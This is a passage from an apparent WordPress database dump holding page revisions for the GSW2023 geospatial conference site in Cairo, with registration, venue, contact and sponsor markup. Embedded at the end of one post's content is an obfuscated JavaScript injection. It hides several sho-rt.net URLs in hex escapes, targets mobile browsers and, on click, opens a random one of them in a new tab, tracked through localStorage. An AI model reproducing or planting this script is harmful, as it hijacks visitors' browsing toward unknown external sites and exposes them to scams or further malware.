2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:43:20','2023-06-01 08:43:20','',3066,'https://gsw2023.com/?p=4599',0,'revision','',0),
(4600,1,'2023-06-01 08:44:28','2023-06-01 08:44:28','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606798260{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official 